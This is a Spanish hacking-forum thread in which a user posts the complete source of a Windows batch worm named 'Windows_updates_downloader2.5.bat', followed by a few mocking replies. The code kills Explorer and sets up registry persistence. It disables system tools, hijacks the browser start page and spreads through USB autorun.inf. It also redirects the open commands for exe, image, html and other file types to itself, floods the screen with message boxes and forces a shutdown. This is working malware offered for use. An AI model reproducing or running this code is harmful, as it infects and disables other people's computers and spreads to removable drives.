elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  worm Windows_updates_downloader2.5.bat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: worm Windows_updates_downloader2.5.bat  (Leído 2,255 veces)
W4rR3d

Desconectado Desconectado

Mensajes: 12


Ver Perfil
worm Windows_updates_downloader2.5.bat
« en: 5 Mayo 2011, 03:04 am »

este worm esta dedicado al grupo de hackers Kao Team
 
 
Código
  1.                         goto per
  2. ::worm Windows_updates_downloader2.5.bat
  3. ::by hacker W4rR3d
  4. ::Comunidad hacker "Black Eye Security Team" Piura -Peru
  5. :per
  6. if exist "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat"  ( goto dn) else goto :NN
  7. :NN
  8. :Encryptions
  9. Set ts=set
  10. %ts% f=f
  11. %ts% ph=copy
  12. %ts% vsb=echo
  13. %ts% lcf=call
  14. %ts% r=r
  15. :registro protection
  16. TASKKILL /IM explorer.exe /F
  17. TASKKILL /IM msnmsgr.exe /F
  18. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v updates /t REG_SZ /d "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat" /f
  19. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  20. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  21. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  22. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  23. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  24. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://windows-updates-downloader.softonic.com/descargar"
  25. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  26. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  27. :agregarse en dispositivos
  28. %f%o%r% %%p in (b e f g h i j k l m n o p q r s t u v w x y z) do if exist %%p:%0 goto LOG
  29. %f%o%r% %%i In (b e f g h i j k l m n o p q r s t u v w x y z)  do type %0 > %%i:
  30. %vsb% [autorun] >> %%i:\autorun.inf
  31. %vsb% open=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
  32. %vsb% shellexecute=Windows_updates_downloader2.5.bat >> %%i:\autorun.inf
  33. %vsb% Icon=%windir%\system32\Shell32.dll,4 >> %%i:\autorun.inf
  34. %vsb% Shell\Open\COMMAND=Windows_updates_downloader2.5.bat
  35. %vsb% Shell\Explore\command=Windows_updates_downloader2.5.bat
  36. %vsb% UseAutoPlay=1
  37. attrib +h +s +r %%i:\autorun.inf
  38. :extenderse
  39. md C:\c5734b2b09076e4acebc92bb8c25
  40. %ph% %0 C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
  41. attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat
  42. attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25
  43. :hidden in bmp
  44. %vsb% On Error Resume Next >> C:\terror.vbs
  45. %vsb% Set Ws = CreateObject("WScript.Shell") >> C:\terror.vbs
  46. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\bmpfile\shell\open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  47. %vsb% Ws.regwrite "HkEY_CLASSES_ROOT\Folder\Shell\Explore\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  48. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\Folder\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  49. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\exefile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  50. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  51. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\jpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  52. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\htmlfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  53. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\HTTP\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  54. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\https\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  55. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inffile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  56. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\inifile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  57. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpegfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  58. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mpgfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  59. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\mp3file\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  60. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\txtfile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  61. %vsb% Ws.regwrite "HKEY_CLASSES_ROOT\wmafile\Shell\Open\command\", "C:\c5734b2b09076e4acebc92bb8c25\Windows_updates_downloader2.5.bat %1 %*" >> C:\terror.vbs
  62. start C:\terror.vbs
  63. :back
  64. %ph% %0 C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Usub.exe
  65. %ph% %0 %SYSTEMROOT%\SYSTEM32\Usub.exe
  66. %ph% %0 %SYSTEMDRIVE%\Usub.exe
  67. %ph% %0 %userprofile%\Usub.exe
  68. %ph% %0 %programfiles%\Usub.exe
  69. %ph% %0 C:\RECYCLER\Usub.bmp
  70. :mensaje
  71. %vsb% On Error Resume Next >> C:\ipnuker.vbs
  72. %vsb% Msgbox "Computer is infected with a virus.",16,"hacked by W4rR3d" >> C:\ipnuker.vbs
  73. For /L %%a IN (0,1,1000) DO start start C:\ipnuker.vbs
  74. :LOG
  75. %vsb% ::USuB Log:: >> USuB_Log.log
  76. %vsb% Directory *c5734b2b09076e4acebc92bb8c25* >> Usub_Log.log
  77. %vsb% USB's in drive A-Z excluding C, D, and E, Installed >> Usub_Log.log
  78. %ph% USuB_Log.log C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
  79. attrib +h +s +r C:\c5734b2b09076e4acebc92bb8c25\Usub_Log.log
  80. del %curdir% Usub_Log.log
  81. :dn
  82. %vsb% On Error Resume Next >> C:\apagar.vbs
  83. %vsb% set shell = CreateObject("WScript.Shell") >> C:\apagar.vbs
  84. %vsb% shell.run "shutdown.exe -s -f -t 8 " >> C:\apagar.vbs
  85. start  C:\apagar.vbs
  86. :Memory Loop
  87. goto Memory Loop


« Última modificación: 15 Mayo 2011, 16:29 pm por W4rR3d » En línea

FranciskoAsdf

Desconectado Desconectado

Mensajes: 231


Ni bueno, ni malo. Solo nada.


Ver Perfil WWW
Re: worm Windows_updates_downloader2.5.bat
« Respuesta #1 en: 5 Mayo 2011, 18:02 pm »

Deberias hacer lo contrario :P


En línea

Asdf debería ser algún tipo de función.
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: worm Windows_updates_downloader2.5.bat
« Respuesta #2 en: 5 Mayo 2011, 20:18 pm »

Siempre con lo mismo  :xD

Por que no inventas un antivirus en batch?
o algun hack tools para el foro... :D?
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
FranciskoAsdf

Desconectado Desconectado

Mensajes: 231


Ni bueno, ni malo. Solo nada.


Ver Perfil WWW
Re: worm Windows_updates_downloader2.5.bat
« Respuesta #3 en: 5 Mayo 2011, 20:32 pm »

Siempre con lo mismo  :xD

Por que no inventas un antivirus en batch?
o algun hack tools para el foro... :D?

+1
En línea

Asdf debería ser algún tipo de función.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
EOF.Bat.Worm
Scripting
y0u uNSeCure 0 1,973 Último mensaje 8 Agosto 2008, 15:58 pm
por y0u uNSeCure
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines